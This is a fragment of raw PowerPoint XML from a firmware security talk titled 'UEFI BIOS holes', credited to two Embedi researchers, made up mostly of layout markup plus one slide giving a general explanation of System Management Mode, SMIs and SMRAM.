          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425"/>
          <a:lstStyle>
            <a:lvl1pPr indent="114300" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="114300" lvl="1" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="114300" lvl="2" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="114300" lvl="3" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="114300" lvl="4" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="114300" lvl="5" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="114300" lvl="6" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="114300" lvl="7" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
              <a:defRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="114300" lvl="8" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="■"/>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xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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xml"/><Relationship Id="rId3"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xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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9.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId5"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hyperlink" Target="mailto:a.ermolov@embedi.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/flothrone" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:r.zakirov@embedi.com" TargetMode="External"/><Relationship Id="rId7"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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId5"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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId5"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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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9.xml"/><Relationship Id="rId3"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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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9.xml"/><Relationship Id="rId3"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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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6.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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7.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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8.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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9.xml"/><Relationship Id="rId3"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5.jp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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.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1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://embedi.com/blog/bypassing-intel-boot-guard" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/REhints/BlackHat_2017" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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3.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.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4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.jp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5.jp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5.jp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269" name="Shape 269"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Shape 270"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731838" y="1872000"/>
            <a:ext cx="11363802" cy="2342949"/>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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>UEFI BIOS holes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="6000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>So Much Magic, Don’t Come Inside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Shape 271"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653142" y="5382089"/>
            <a:ext cx="6096000" cy="774571"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Alexander Ermolov, Security researcher Embedi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1001"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>Ruslan Zakirov, Security researcher Embedi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="272" name="Shape 272"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="882242" y="403172"/>
            <a:ext cx="1498958" cy="73751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347" name="Shape 347"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 348"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641975" y="1559875"/>
            <a:ext cx="5714100" cy="4176300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="77B82A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="77B82A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Special processor mode for runtime handling system management tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Roboto Condensed"/>
              <a:ea typeface="Roboto Condensed"/>
              <a:cs typeface="Roboto Condensed"/>
              <a:sym typeface="Roboto Condensed"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>To turn the CPU in this mode the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>SMIs are used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>After dispatching the SMI event, t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>he appropriate SMI handler should be called to handle the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>The whole amount of</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>which is to be executed in SMM is</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> placed into the hidden SMRAM which is not visible for CPU in any other mode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 349"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
